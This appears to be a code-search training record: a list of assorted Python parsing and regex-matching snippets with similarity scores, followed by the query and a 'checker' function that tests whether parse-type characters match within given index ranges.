message.update_entity(regroup, value, None)\n matched_skills.append(\n {\n \"score\": await calculate_score(\n opts[\"expression\"], opts[\"score_factor\"]\n ),\n \"skill\": skill,\n \"config\": skill.config,\n \"message\": message,\n }\n )\n return matched_skills", "def first_match(s,patterns):\n\n for p in patterns:\n m=p.match(s)\n if m:\n return p,m\n return None,None", "def SearchRe(context, pattern, arg=None):\n if not arg:\n arg = context.node\n arg = Conversions.StringValue(arg)\n matches = re.findall(pattern, arg)\n proc = context.processor\n matches_nodeset = []\n for groups in matches:\n proc.pushResult()\n proc.writers[-1].startElement('Match', EMPTY_NAMESPACE)\n if type(groups) != type(()):\n groups = (groups,)\n for group in groups:\n proc.writers[-1].startElement('Group', EMPTY_NAMESPACE)\n proc.writers[-1].text(group)\n proc.writers[-1].endElement('Group')\n proc.writers[-1].endElement('Match')\n frag = proc.popResult()\n context.rtfs.append(frag)\n matches_nodeset.append(frag.childNodes[0])\n return matches_nodeset", "def parse(self, buf: memoryview, params: Params) \\\n -> tuple[ParseableTypeT_co, memoryview]:\n ...", "def test_searchMessageSetWithStar(self):\n return self._messageSetSearchTest('2:*', [2, 3, 4, 5])", "def parse_messages(buffer):\n messages = []\n message, expected = parse_message(buffer)\n\n while message:\n messages.append(message)\n message, expected = parse_message(buffer)\n\n return messages, expected", "def rpc_match():", "def parse_many2(self,\n inuse=None,\n tcache=None,\n fast=None,\n allow_invalid=False,\n separate_addresses_non_verbose=True,\n header_once=None,\n count_handle=None,\n count_printed=None,\n ):\n addresses = []\n if not self.args.addresses:\n print(\"WARNING: No address supplied?\")\n self.parser.print_help()\n return []\n else:\n addresses = self.dbg.parse_address(self.args.addresses)\n if len(addresses) == 0:\n pu.print_error(\"WARNING: No valid address supplied\")\n self.parser.print_help()\n return []\n\n if self.args.hexdump_unit not in h.hexdump_units:\n pu.print_error(\"Wrong hexdump unit specified\")\n self.parser.print_help()\n return []\n hexdump_unit = self.args.hexdump_unit\n count = self.args.count\n search_depth = self.args.search_depth\n skip_header = self.args.skip_header\n print_offset = self.args.print_offset\n metadata = self.args.metadata\n verbose = self.args.verbose\n no_newline = self.args.no_newline\n debug = self.args.debug\n hexdump = self.args.hexdump\n maxbytes = self.args.maxbytes\n commands = self.args.commands\n address_offset = self.args.address_offset\n\n if self.args.search_type not in ptchunk.search_types:\n pu.print_error(f\"Wrong search type specified {self.args.search_type}\")\n self.parser.print_help()\n return []\n if self.args.search_type != \"string\" and not self.args.search_value.startswith(\"0x\"):\n pu.print_error(\"Wrong search value for specified type\")\n self.parser.print_help()\n return []\n search_value = self.args.search_value\n search_type = self.args.search_type\n match_only = self.args.match_only\n\n highlight_only = self.args.highlight_only\n highlight_addresses = []\n if self.args.highlight_addresses:\n list_highlight_addresses = [e.strip() for e in self.args.highlight_addresses.split(\",\")]\n highlight_addresses = self.dbg.parse_address(list_highlight_addresses)\n if len(highlight_addresses) == 0:\n pu.print_error(\"WARNING: No valid address to highlight supplied\")\n self.parser.print_help()\n return []\n highlight_metadata = []\n if self.args.highlight_metadata:\n highlight_metadata = [e.strip() for e in self.args.highlight_metadata.split(\",\")]\n\n # some commands inheriting ptchunk arguments don't support highlighting types\n try:\n highlight_types = self.args.highlight_types\n except AttributeError:\n highlight_types = None\n if highlight_types:\n highlight_types = [e.strip() for e in highlight_types.split(\",\")]\n for e in highlight_types:\n if e not in [\"M\", \"F\", \"f\", \"t\"]:\n pu.print_error(\"WARNING: Invalid type to highlight supplied\")\n self.parser.print_help()\n return []\n else:\n highlight_types = []\n\n\n all_chunks = []\n chunks = None\n for address in addresses:\n if chunks is not None and len(chunks) > 0 and \\\n (separate_addresses_non_verbose or verbose > 0):\n print(\"-\" * 60)\n\n if count_printed == None:\n count_linear = count\n elif count == None:\n count_linear = count_printed\n else:\n count_linear = min(count_printed, count)\n chunks = ptchunk.parse_many(\n address, self.ptm, self.dbg, count_linear, count_handle, search_depth,\n skip_header, hexdump_unit, search_value, \n search_type, match_only, print_offset, verbose, no_newline,\n debug, hexdump, maxbytes, metadata,\n highlight_types=highlight_types,\n highlight_addresses=highlight_addresses,\n highlight_metadata=highlight_metadata,\n highlight_only=highlight_only,\n inuse=inuse, tcache=tcache, fast=fast, allow_invalid=allow_invalid,\n header_once=header_once, commands=commands,\n use_cache=True, # we enforced updating the cache once above so no need to do it for every chunk\n address_offset=address_offset\n )\n if chunks is not None and len(chunks) > 0:\n all_chunks.extend(chunks)\n if count_printed != None:\n count_printed -= len(chunks)\n header_once = None\n if count_printed == 0:\n break\n return all_chunks", "def getContentList(self, webcontent, index):\n try:\n repattern = re.compile(self.RegEx[index], re.IGNORECASE)\n foundlist = re.findall(repattern, webcontent)\n return foundlist\n except:\n self.postErrorMessage(self.ErrorMessage + \" \" + self.FullURL)\n return None", "def parseResult(self):\n\n # parse all WHYPO tags\n result = []\n for msg in [m for m in self.msg if \"WHYPO\" in m]:\n result.append({})\n\n for prop in self.pattern.findall(msg):\n key = prop.split(\"=\")[0]\n value = prop.split('\"')[1]\n\n if key == \"CM\":\n try:\n value = float(value)\n except:\n pass\n if key == \"CLASSID\":\n try:\n value = int(value)\n except:\n pass\n result[-1][key] = value\n\n return result", "def _get_matching_records(self, args, manifest) -> ty.List[dict]:\n if args.all:\n records = manifest._items # type: ty.List[dict]\n else:\n tags = dict(args.tag or [])\n try:\n records = [manifest.locate(args.type[0], **tags)]\n except exceptions.NoMatchingAsset:\n records = []\n return records", "def __getitem__(self, regexp, return_names=False):\r\n matches = self.grep_param_names(regexp)\r\n if len(matches):\r\n if return_names:\r\n return self._get_params()[matches], np.asarray(self._get_param_names())[matches].tolist()\r\n else:\r\n return self._get_params()[matches]\r\n else:\r\n raise AttributeError, \"no parameter matches %s\" % regexp", "def multi_parse(templates, text):\n for template in templates:\n parsed = parse(template, text)\n if parsed:\n return parsed\n\n raise ValueError(\n f\"'{text}' does not match any template: {templates}\")", "def search_dialog_group(log_info, logs, curr_idx):\n content = log_info['content']\n dialog = content['dialog']\n msg_type = content['msgType']\n\n search_target = None\n search_msg_type = None\n search_action_name = None\n search_action = None\n if msg_type.lower() == 'touchevent' and content['actionId'] == 0:\n # Touch down\n search_msg_type = msg_type\n search_action_name = 'actionId'\n search_action = 1\n search_target = dialog\n if msg_type.lower() == 'keyevent' and content['actionCode'] == 0:\n # Key down\n search_msg_type = msg_type\n search_action_name = 'actionCode'\n search_action = 1\n search_target = dialog\n\n if search_target is None:\n return None, curr_idx + 1\n \n # Search\n idx = curr_idx + 1\n while idx < len(logs):\n _log_info = extract_info(logs[idx])\n _content = _log_info['content']\n idx += 1\n\n if _log_info['tag'] == DIALOG_TAG and _content['msgType'] == search_msg_type and _content['dialog'] == search_target and _content[search_action_name] == search_action:\n return (curr_idx, idx-1, DIALOG_TAG, dialog, search_msg_type), idx\n\n return (curr_idx, curr_idx, DIALOG_TAG, dialog, search_msg_type), curr_idx + 1", "def test_multi_no_match_return_expr(self):\n eq_(None,line_no_matches_ngreps(self.line,[\"foo\",\"idontmatch\"]))", "def parse_gretchens_notes(email_payload: str\n ) -> Tuple[List[Activity], List[Nap]]:\n print('start parsing email')\n # TODO: Find a clever way to detect time zone\n time_zone = pytz.timezone('US/Eastern')\n\n payload = _remove_line_breaks(email_payload)\n\n # get document attributes\n child_name_re = re.search(\"class=\\\"heading-name\\\">(.*)'s Daily Note<\",\n payload)\n if child_name_re:\n child_name = child_name_re.group(1)\n else:\n raise ValueError(\"Could not find child's name\")\n\n date_re = re.search(\"class=\\\"heading-date\\\">(.*?)<\",\n payload)\n if date_re:\n date_str = re.sub('(rd|st|th|nd)', '', date_re.group(1))\n date_py = datetime.strptime(date_str, '%B %d, %Y')\n date = date_py.strftime('%Y-%m-%d')\n else:\n raise ValueError(\"Could not find date\")\n\n # get activities and notes\n act_split = payload.split('class=\"activity-middle activity-name\">')\n re_begin = re.compile(\"^(.*?)</td>\")\n re_result = re.compile(\"class=\\\"activity-middle activity-result\\\">\"\n \"(.*?)</td>\")\n re_note = re.compile(\"class=\\\"activity-middle activity-notes\\\">\"\n \"(.*?)</td>\")\n # (lower case) headings without time\n non_time_headings = ['note', 'supplies']\n activities = []\n for act_str in act_split[1:]:\n activity_name = re_begin.search(act_str).group(1)\n print('ACTIVITY:', activity_name)\n\n # remove out unwanted stuff\n act_str = re_begin.sub('', act_str)\n act_str = act_str.replace('</body></html>', '')\n\n if activity_name.lower() not in non_time_headings:\n\n act_sub_split = act_str.split(\n \"class=\\\"activity-left activity-time\\\">\"\n )\n for act_sub in act_sub_split[1:]:\n time_str = re_begin.search(act_sub).group(1)\n # parse this time\n py_time = datetime.strptime(time_str, '%I:%M%p')\n if date_py is None:\n e_str = 'Activity time found before date?'\n raise ValueError(e_str)\n activity_time = _make_iso_time(py_time,\n date_py,\n time_zone)\n print('Activity time:', activity_time)\n # result\n activity_result = re_result.search(act_sub).group(1)\n print('Activity result:', activity_result)\n activity_note_re = re_note.search(act_sub)\n if activity_note_re:\n activity_note = activity_note_re.group(1)\n print('Activity note:', activity_note)\n else:\n activity_note = None\n\n activities.append(Activity(first_name=child_name,\n date=date,\n activity=activity_name,\n datetime=activity_time,\n result=activity_result,\n notes=activity_note))\n\n else:\n # notes are split by result, not time\n act_sub_split = act_str.split(\n \"class=\\\"activity-middle activity-result\\\">\"\n )\n activity_time = None\n for act_sub in act_sub_split[1:]:\n activity_result = re_begin.search(act_sub).group(1)\n print('Note result:', activity_result)\n activity_note_re = re_note.search(act_sub)\n if activity_note_re:\n activity_note = activity_note_re.group(1)\n print('Note note:', activity_note)\n else:\n activity_note = None\n activities.append(Activity(first_name=child_name,\n date=date,\n activity=activity_name,\n datetime=activity_time,\n result=activity_result,\n notes=activity_note))\n\n print('---')\n\n # parse naps\n re_nap = re.compile('([0-9]+:[0-9]+ (AM|PM)) - ([0-9]+:[0-9]+ (AM|PM))')\n naps = []\n for act in activities:\n if act.activity.upper() == 'NAP':\n re_nap_search = re_nap.search(act.result)\n if re_nap_search is None:\n e_str = 'No nap time found in string: {}'.format(act.result)\n raise ValueError(e_str)\n nap_start, nap_end = re_nap_search.group(1), re_nap_search.group(3)\n nap_start_time = _make_iso_time(\n datetime.strptime(nap_start, '%I:%M %p'),\n date_py,\n time_zone\n )\n nap_end_time = _make_iso_time(\n datetime.strptime(nap_end, '%I:%M %p'),\n date_py,\n time_zone\n )\n naps.append(Nap(child_name,\n nap_start_time,\n nap_end_time))\n return activities, naps", "def Consume(cls, raw):\n assert cls.REGEX is not None, f\"{cls!r} expected to have REGEX attribute not None for {raw!r}\"\n # assert len(cls.CONTENT_RULES) != 0, f\"{cls!r} must have CONTENT_RULES set\"\n\n product = None\n post = None\n\n regexs = [cls.REGEX]if isinstance(cls.REGEX, list) is False else cls.REGEX\n\n for regex in regexs:\n match = regex.search(raw)\n\n if match is not None:\n\n match_start = match.start()\n match_end = match.end()\n product = cls(match.group(\"content\"), match_start, match_end)\n return raw, product\n else:\n return raw, None", "def parse_crypto_calls(message_text):\n string = message_text.split()\n if '!price' == string[0]:\n try:\n return (None, string[1])\n except IndexError:\n return (None, None)\n elif '!top' == string[0]:\n return (None, string[0])\n elif '!exit' == string[0]:\n return (None, string[0])\n elif '!ping' == string[0]:\n return (None, string[0])\n else:\n #the first group contains the username, the second group contains the maining message\n return (None, None)", "def _matching_closing_tags(self, offset, stack, matching):\n if not stack:\n return (stack, matching)\n last = stack[-1]\n if self.source_tags.closing_tags.get(offset,{}).get(last.begin,{}).get(last.name,False):\n stack.pop()\n matching.append(last)\n return self._matching_closing_tags(offset, stack, matching)\n else:\n return (stack, matching)", "def search_activity_group(log_info, logs, curr_idx):\n content = log_info['content']\n plid = log_info['plid']\n package = log_info['package']\n activity = content['activity']\n msg_type = content['msgType']\n\n search_target = None\n search_msg_type = None\n search_action_name = None\n search_action = None\n if msg_type.lower() == 'touchevent' and content['actionId'] == 0:\n # Touch down\n search_msg_type = msg_type\n search_action_name = 'actionId'\n search_action = 1\n search_target = activity\n down_time = content['downTime']\n if msg_type.lower() == 'keyevent' and content['actionCode'] == 0:\n # Key down\n search_msg_type = msg_type\n search_action_name = 'actionCode'\n search_action = 1\n search_target = activity\n down_time = content['downTime']\n\n if search_target is None:\n return None, curr_idx + 1\n\n # Search\n idx = curr_idx + 1\n return_idx = -1\n while idx < len(logs):\n _log_info = extract_info(logs[idx])\n _content = _log_info['content']\n idx += 1\n\n if _log_info['tag'] == ACTIVITY_TAG and _content['msgType'] == search_msg_type \\\n and _content['activity'] == search_target and _content[search_action_name] == search_action and _content['downTime'] == down_time:\n if return_idx == -1:\n return_idx = idx\n return (curr_idx, idx-1, ACTIVITY_TAG, activity, search_msg_type), return_idx\n\n if _log_info['tag'] == POPUPWINDOW_TAG:\n return_idx = idx - 1\n\n return (curr_idx, curr_idx, ACTIVITY_TAG, activity, search_msg_type), curr_idx + 1", "def process_match_result(self, match):\n raise NotImplementedError()", "def extract_element(element,default_tag_type='regular'):\r\n if element.tag == 'node':\r\n return extract_node(element,NODE_FIELDS,PROBLEMCHARS,default_tag_type)\r\n if element.tag == 'way':\r\n return extract_way(element,WAY_FIELDS,PROBLEMCHARS,default_tag_type)", "def test_type_result(self):\n result = self.parser.msg_analysis(MSG_TEST_NO_RESULT[0])\n assert isinstance(result, list)", "def _parse_line(line):\n\n for key, rx in rx_dict.items():\n match = rx.search(line)\n if match:\n return key, match\n # if there are no matches\n return None, None", "def _parse_line(line):\n\n for key, rx in rx_dict.items():\n match = rx.search(line)\n if match:\n return key, match\n # if there are no matches\n return None, None", "def nms_match(dets: array_like_type,\n iou_threshold: float) -> List[array_like_type]:\n if dets.shape[0] == 0:\n matched = []\n else:\n assert dets.shape[-1] == 5, 'inputs dets.shape should be (N, 5), ' \\\n f'but get {dets.shape}'\n if isinstance(dets, Tensor):\n dets_t = dets.detach().cpu()\n else:\n dets_t = torch.from_numpy(dets)\n indata_list = [dets_t]\n indata_dict = {'iou_threshold': float(iou_threshold)}\n matched = ext_module.nms_match(*indata_list, **indata_dict)\n if torch.__version__ == 'parrots':\n matched = matched.tolist() # type: ignore\n\n if isinstance(dets, Tensor):\n return [dets.new_tensor(m, dtype=torch.long) for m in matched]\n else:\n return [np.array(m, dtype=int) for m in matched]", "def test_searchMessageSetWithStarFirst(self):\n return self._messageSetSearchTest('*:2', [2, 3, 4, 5])", "def test_multi_match_return_expr(self):\n eq_(self.line,line_matches_greps(self.line,[\"foo\",\"bar\"]))", "def getMatch(reMatch,group=0):\n if reMatch: return reMatch.group(group)\n else: return ''", "def SearchRePy20(context, pattern, arg=None):\n if not arg:\n arg = context.node\n arg = Conversions.StringValue(arg)\n proc = context.processor\n matches_nodeset = []\n _re =re.compile(pattern)\n _match =_re.search(arg)\n while _match:\n proc.pushResult()\n proc.writers[-1].startElement('Match', EMPTY_NAMESPACE)\n _groups =_match.groups()\n # .groups() return empty tuple when the pattern did not do grouping\n if not _groups: _groups =tuple(_match.group())\n for group in _groups:\n proc.writers[-1].startElement('Group', EMPTY_NAMESPACE)\n # MatchObject groups return None if unmatched\n # unlike .findall() returning empty strings\n proc.writers[-1].text(group or '')\n proc.writers[-1].endElement('Group')\n proc.writers[-1].endElement('Match')\n frag = proc.popResult()\n context.rtfs.append(frag)\n matches_nodeset.append(frag.childNodes[0])\n _match =_re.search(arg, _match.end())\n return matches_nodeset", "def optional(*patterns: Any) -> Any: # type: ignore\n strings: List[str] = []\n for pattern in each_string(*patterns):\n if not isinstance(pattern, AnnotatedStr):\n pattern = AnnotatedStr(pattern)\n pattern.optional = True\n strings.append(pattern)\n if len(patterns) == 1 and isinstance(patterns[0], str):\n assert len(strings) == 1\n return strings[0]\n return strings", "def skip(self, word_list, word_type):\n\n while self.peek(word_list) == word_type:\n self.match(word_list, word_type)", "def sieve_function(raw_data):\n matchers = []\n return_list = []\n\n matchers.append(SBE19DataParticle.regex_compiled())\n matchers.append(SBE19HardwareParticle.regex_compiled())\n matchers.append(SBE19CalibrationParticle.regex_compiled())\n matchers.append(SBE19StatusParticle.regex_compiled())\n matchers.append(SBE19ConfigurationParticle.regex_compiled())\n matchers.append(OptodeSettingsParticle.regex_compiled())\n\n for matcher in matchers:\n for match in matcher.finditer(raw_data):\n return_list.append((match.start(), match.end()))\n\n return return_list", "def match(self, *args):\n return _ida_hexrays.udc_filter_t_match(self, *args)", "def match(self, url):\n return list(\n {\n message\n for message in self.active()\n if message.is_global or message.match(url)\n }\n )", "def getResponse(body, skipPartial=True):\n # If there is a schmeckle value in body\n if p.search(body):\n if skipPartial and not any([q in body.lower() for q in question_indicators]):\n print(\"\\n------\\nPartial Match Skipped:\\n%s\\n------\\n\"%body)\n return None\n quote = getQuote(body)\n conversion, values = getConversion(body)\n\n # Combine into message\n msg = \"\\n\\n\".join(quote)\n msg += \"\\n\" + \"\\n\".join(conversion)\n msg += \"\\n---\\n\"\n msg += \"\\n[^(1 Schmeckle = $148 USD)](https://www.reddit.com/r/IAmA/comments/202owt/we_are_dan_harmon_and_justin_roiland_creators_of/cfzfv79)^( | price not guaranteed |) [^(`what is my purpose`)](https://github.com/Elucidation/schmeckle_bot 'convert Schmeckles to USD')\"\n return [quote, conversion, values, msg]\n\n return None", "def Consume(cls, raw):\n assert cls.REGEX is not None, f\"{cls!r} expected to have REGEX attribute not None for {raw!r}\"\n # assert len(cls.CONTENT_RULES) != 0, f\"{cls!r} must have CONTENT_RULES set\"\n\n product = None\n post = None\n\n regexs = [cls.REGEX]if isinstance(cls.REGEX, list) is False else cls.REGEX\n\n for regex in regexs:\n match = regex.search(raw)\n\n if match is not None:\n\n match_start = match.start(0)\n match_end = match.end(0)+1\n groups = match.groupdict()\n if \"content\" in groups:\n del groups['content']\n\n product = cls(match.group(1), match_start, match_end, **groups)\n return raw, product\n else:\n return raw, None", "def interpret(self, match):\n raise NotImplementedError()", "def find_next(lines, find_str, start_index):\n mode = None\n if isinstance(find_str, basestring):\n mode = 'normal'\n message = find_str\n elif isinstance(find_str, Invert):\n mode = 'invert'\n message = str(find_str)\n else:\n raise TypeError(\"Unsupported message type\")\n for i in range(start_index, len(lines)):\n if re.search(message, lines[i]):\n return mode == 'normal', i, lines[i]\n elif message in lines[i]:\n return mode == 'normal', i, lines[i]\n if mode == 'invert':\n return True, len(lines), None\n raise LookupError(\"Not found\")", "def match(parser):\n def run(parser, chunks, chunk, last):\n chunks = (chunk, chunks)\n result = parser.__parser__()(chunk, last)\n tupe, value = result\n if tupe & ParserResult.DONE:\n value, chunk, last = value\n match = _chunks_merge(chunks)[:-len(chunk)] if chunk else _chunks_merge(chunks)\n return ParserResult.from_done((match, value), chunk, last)\n elif tupe & ParserResult.PARTIAL:\n return ParserResult.from_partial(Parser(run, value, chunks))\n else:\n return result\n return Parser(run, parser, tuple())", "def split_match(self, match):\n match, line, col, error, warning, msg, _ = super().split_match(match)\n col_end = int(match.group(3))\n token_len = col_end - col\n return match, line, col, error, warning, msg, \".\" * token_len", "def parse(self):\n\t\tfor part in self.mail.walk():\n\t\t\tself.process_part(part)", "def subStringMatchExact(target,key):\r\n index = find(target,key)\r\n #print 'here',target,key,index\r\n if index < 0 or len(key) <= 0 or len(target) <= 0:\r\n return ()\r\n matches = subStringMatchExact(target[index+len(key):len(target)],key)\r\n offset = index + len(key)\r\n temp_matches = ()\r\n #print matches\r\n if matches:\r\n for x in range(0, len(matches)) :\r\n temp_matches += ((matches[x] + offset),)\r\n #matches.insert(0,index)\r\n temp_matches = (index,) + temp_matches\r\n return temp_matches", "def _MatchType2(self, command_task, extra_required_attrs):\n for group in six.itervalues(self._groups):\n matched_devices = self._MatchGroup(\n group,\n command_task.test_bench.host.groups[0],\n extra_required_attrs)\n if matched_devices:\n return matched_devices\n return None", "def parse_body(body):\n for line in body.lower().split(\"\\n\"):\n words = line.split()\n try:\n idx = words.index(\"re-run\")\n except ValueError:\n continue\n if words[idx + 1] == \"full\":\n yield words[idx : idx + 3]\n else:\n yield words[idx : idx + 2]", "def test_reversedSearchTerms(self):\n msgset = imap4.parseIdList(b'4:2')\n self.assertEqual(list(msgset), [2, 3, 4])", "def find_match(self, regex: str, blob: str, flags: re.RegexFlag = re.IGNORECASE,\n many: bool = False) -> Union[str, List[str], None]:\n if many:\n matches = re.findall(regex, blob, flags=flags)\n return [self._process(m) for m in matches if m]\n else:\n match = re.search(regex, blob, flags=flags)\n if match:\n return self._process(match.group(1))\n return None", "def get_command_match(\n command_list: List[Tuple[re.Match, callable]], message: str\n) -> Optional[Tuple[dict, callable]]:\n command = message.content # get the text in message\n\n match_list = map(lambda match: (match[0].match(command), match[1]), command_list)\n\n for command_patter, command_func in match_list:\n if command_patter:\n return command_patter.groupdict(), command_func\n\n return None", "def test_regex_matches_multiple_valid(self):\n token_1 = \"NDY3MjIzMjMwNjUwNzc3NjQx.XsyWGg.uFNEQPCc4ePwGh7egG8UicQssz8\"\n token_2 = \"NDcyMjY1OTQzMDYyNDEzMzMy.XsyWMw.l8XPnDqb0lp-EiQ2g_0xVFT1pyc\"\n message = f\"garbage {token_1} hello {token_2} world\"\n\n results = token_remover.TOKEN_RE.finditer(message)\n results = [match[0] for match in results]\n self.assertCountEqual((token_1, token_2), results)" ]
[ "0.5471574", "0.52397555", "0.5145322", "0.5005529", "0.49990287", "0.49739963", "0.49577978", "0.49357885", "0.49001318", "0.48870462", "0.48827666", "0.4872868", "0.48422822", "0.48398778", "0.48214757", "0.4820572", "0.48020837", "0.47951323", "0.4777706", "0.4765019", "0.4747468", "0.47409493", "0.4740511", "0.47404638", "0.47373354", "0.47322333", "0.47295514", "0.47075036", "0.47044677", "0.4700549", "0.46925032", "0.4683527", "0.4683198", "0.4674361", "0.46496242", "0.46379036", "0.46376717", "0.4636181", "0.4622107", "0.46211895", "0.46192685", "0.46177813", "0.4617687", "0.46163598", "0.46132362", "0.46130025", "0.46069217", "0.4590609", "0.45872813", "0.45872813", "0.4582075", "0.45715886", "0.45645368", "0.45617384", "0.4550187", "0.4532894", "0.45253974", "0.45211515", "0.45209426", "0.4502205", "0.45012712", "0.44990402", "0.44978875", "0.44976088", "0.44943747", "0.4491624", "0.4478749", "0.44781217", "0.44527987", "0.44496685", "0.44469097", "0.44463122", "0.4443633", "0.44410247", "0.44355556", "0.44355556", "0.4432875", "0.44208455", "0.44176337", "0.44160047", "0.44150707", "0.44119987", "0.44088104", "0.44012544", "0.43956771", "0.43950093", "0.4394349", "0.43878683", "0.4384164", "0.4378155", "0.43768305", "0.43751824", "0.43722433", "0.43721724", "0.43612745", "0.4354767", "0.43530428", "0.4351609", "0.43475646", "0.43464246" ]
0.5920306
0
return True if parameters does match the parse_type match is the amount of each parse_type elements you want to search. You can write www to check 3 words in a row ranges follow the same syntax as occurences except it targets indexes
def checker(self, match="xw", ranges="0,1", in_a_row=True, reverse=False): res = [] length = len(self.parse_type) if ranges != None: ranges = str(ranges) index_array = self.indexes(ranges) substring = "" for idx in range(length*reverse-reverse, length*(-reverse+1)-reverse, (-reverse)*2+1): #xd lol if idx in index_array: substring += self.parse_type[idx] if in_a_row == True: return (match in substring) if in_a_row == False: target = 0 for i in substring: target += (match[target] == i) return (target == maxi) if in_a_row == None: for i in self.parse_type: if i in match: match = match.replace(i, '', 1) return (match == "") return None
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def _match(self, *token_types):\n for token in token_types:\n if self._check(token):\n self._advance()\n return True\n\n return False", "def _multiindex_row_in(cls, row, parse_list, start=None, stop=None):\n\n row_sub = row[start:stop]\n for tokens in parse_list:\n\n # A single row will never match an empty token list:\n if not tokens:\n continue\n\n # Check whether all of the entries in `row_sub` match some list of\n # tokens. If this loop terminates prematurely because of a mismatch\n # between `row_sub` and some list of tokens in `parse_list`, it will\n # not return True; this forces checking of the subsequent token\n # lists:\n for i, token in enumerate(tokens):\n\n # '*' matches everything:\n if token == '*':\n continue\n\n # Integers and strings must match exactly:\n elif isinstance(token, (int, long, basestring)):\n if row_sub[i] != token:\n break\n\n # Tokens must be in a set of values:\n elif type(token) == list:\n if row_sub[i] not in token:\n break\n\n # Token must be within range of an interval:\n elif type(token) == slice:\n i_start = token.start\n i_stop = token.stop\n\n # Handle intervals with ambiguous start or stop values:\n if (i_start is not None and row_sub[i] < i_start) or \\\n (i_stop is not None and row_sub[i] >= i_stop):\n break\n else:\n continue\n else:\n return True\n\n # If the function still hasn't returned, no match was found:\n return False", "def _index_row_in(cls, row, parse_list):\n\n # Since `row` is a scalar, it need only match the sole entry of one of\n # the lists in `parse_list`:\n for tokens in parse_list:\n if not tokens:\n continue\n if len(tokens) > 1:\n raise ValueError('index row only is scalar')\n if tokens[0] == '*':\n return True\n elif isinstance(tokens[0], (int, long, basestring)):\n if row == tokens[0]:\n return True\n elif type(tokens[0]) == list:\n if row in tokens[0]:\n return True\n elif type(tokens[0]) == slice:\n i_start = tokens[0].start\n i_stop = tokens[0].stop\n if (i_start is None or row >= i_start) and \\\n (i_stop is None or row < i_stop):\n return True\n else:\n continue\n return False", "def match(self, *ial):\n for b, c in ial:\n assert len(b) == len(c), \"parameter length mismatch\"\n if self._.d != len(b):\n continue\n if len(self._match(b, c)) > 0:\n return True\n return False", "def IsValidInputType(self, list_of_matches):\n for entry in list_of_matches:\n if not entry:\n return False\n\n return True", "def match(self) -> bool:", "def matches(inline,groupby,groupvals):\n for i,m in enumerate(groupby):\n if inline[m] == groupvals[i]:\n continue\n else:\n return False\n return True", "def match(self, name, tags):\n or_exprs, tags = self.get_compiled(name, tags)\n \n # or_exprs = [{'a'}, {'c'}, {'d', 'a'}, {'d', 'e'}]\n return any(and_expr <= tags for and_expr in or_exprs)", "def matches(self, python):\n return False", "def test(types, _):\n return 'Date' in types and 'Postal Code' in types", "def match(self, data):\n # self.logger.debug('Running yara, nlp against data')\n # malicious = self._rules.match(data=data)\n # md5 = hashlib.md5(data).hexdigest()\n # if malicious:\n # for match in malicious:\n # self.logger.info('Match found; Rule: \\'%s\\';'\n # 'Namespace: \\'%s\\'; MD5: %s' %\n # (match.rule, match.namespace, md5))\n\n # return True\n \n cnt_name = 0\n cnt_dob = 0\n cnt_acc = 0\n cnt_email = 0\n cnt_line = 0\n\n for line in data: \n cnt_name += self.humanName(line)\n cnt_dob += self.dob(line)\n cnt_acc += self.account_phone(line)\n cnt_email += self.email(line)\n cnt_line += 1\n\n sum = cnt_name + cnt_dob + cnt_acc + cnt_email\n if sum > 100 or sum > cnt_line:\n return True\n else:\n return False\n return False", "def matches(self, test_string, parse_all=True):\n try:\n self.parse_string(text(test_string), parse_all=parse_all)\n return True\n except ParseException:\n return False", "def filt(item):\n result = (((item.done and opt.list_complete) or\n (not item.done and not opt.hide_incomplete)) and\n ((item.time is None) or\n ((opt.start_date is None or opt.start_date < item.time) and\n item.time < opt.end_date)))\n for arg in args:\n result = result and (re.search(arg, item.text) != None)\n return result", "def is_valid(teorema, args):\n if args.ignore_case:\n for value in teorema.values():\n if args.pattern.lower() in value.lower():\n return True\n else:\n for value in teorema.values():\n if args.pattern in value:\n return True\n\n return False", "def _block_matches_all(block_data):\n # do the checks which don't require loading any additional data\n if (\n self._block_matches(block_data, qualifiers) and\n self._block_matches(block_data.fields, settings)\n ):\n if content:\n definition_block = self.get_definition(course_locator, block_data.definition)\n return self._block_matches(definition_block['fields'], content)\n else:\n return True", "def _match_entry_type(self, code_entry, type_tuple):\n matched = False\n if self.loading_from_file:\n type_list = []\n for elem in type_tuple:\n type_list.append(str(elem))\n matched = self._match_entry_type_string(code_entry, type_list)\n else:\n matched = self._match_entry_type_tuple(code_entry, type_tuple)\n return matched", "def test_multi_match_return_expr(self):\n eq_(self.line,line_matches_greps(self.line,[\"foo\",\"bar\"]))", "def route_match(self):\n if self.whole_word_var.get():\n self.whole_word_matches()\n else:\n self.partial_word_matches()", "def route_match(self):\n if self.whole_word_var.get():\n self.whole_word_matches()\n else:\n self.partial_word_matches()", "def _match_array(tipo, array):\n\n return bool(re.match(array, tipo))", "def valid_retag_params(self) -> bool:\n if not (self.action[0] == Actions.RETAG.value):\n return False\n pairs = self.action[1].split(\",\")\n for pair in pairs:\n if not self.correct_retag_pair(pair):\n return False\n return True", "def _match_entry_type_tuple(code_entry, type_tuple):\n entry_type = code_entry['type']\n return entry_type in type_tuple", "def matches(self):\n pass", "def _validate_speech_acts_section(\n protocol_specification: ProtocolSpecification,\n) -> Tuple[bool, str, Optional[Set[str]], Optional[Set[str]]]:\n custom_types_set = set()\n performatives_set = set()\n\n content_names_types: Dict[str, Tuple[str, str]] = {}\n\n # check that speech-acts definition is not empty\n if len(protocol_specification.speech_acts.read_all()) == 0:\n return (\n False,\n \"Speech-acts cannot be empty!\",\n None,\n None,\n )\n\n for (\n performative,\n speech_act_content_config,\n ) in protocol_specification.speech_acts.read_all():\n\n # Validate performative name\n (\n result_performative_validation,\n msg_performative_validation,\n ) = _validate_performatives(performative)\n if not result_performative_validation:\n return (\n result_performative_validation,\n msg_performative_validation,\n None,\n None,\n )\n\n performatives_set.add(performative)\n\n for content_name, content_type in speech_act_content_config.args.items():\n\n # Validate content name\n (\n result_content_name_validation,\n msg_content_name_validation,\n ) = _validate_content_name(content_name, performative)\n if not result_content_name_validation:\n return (\n result_content_name_validation,\n msg_content_name_validation,\n None,\n None,\n )\n\n # check type of content_type\n if not isinstance(content_type, str):\n return (\n False,\n \"Invalid type for '{}'. Expected str. Found {}.\".format(\n content_name, type(content_type)\n ),\n None,\n None,\n )\n\n # Validate content type\n (\n result_content_type_validation,\n msg_content_type_validation,\n ) = _validate_content_type(content_type, content_name, performative)\n if not result_content_type_validation:\n return (\n result_content_type_validation,\n msg_content_type_validation,\n None,\n None,\n )\n\n # check content name isn't repeated with a different type\n if content_name in content_names_types:\n last_performative = 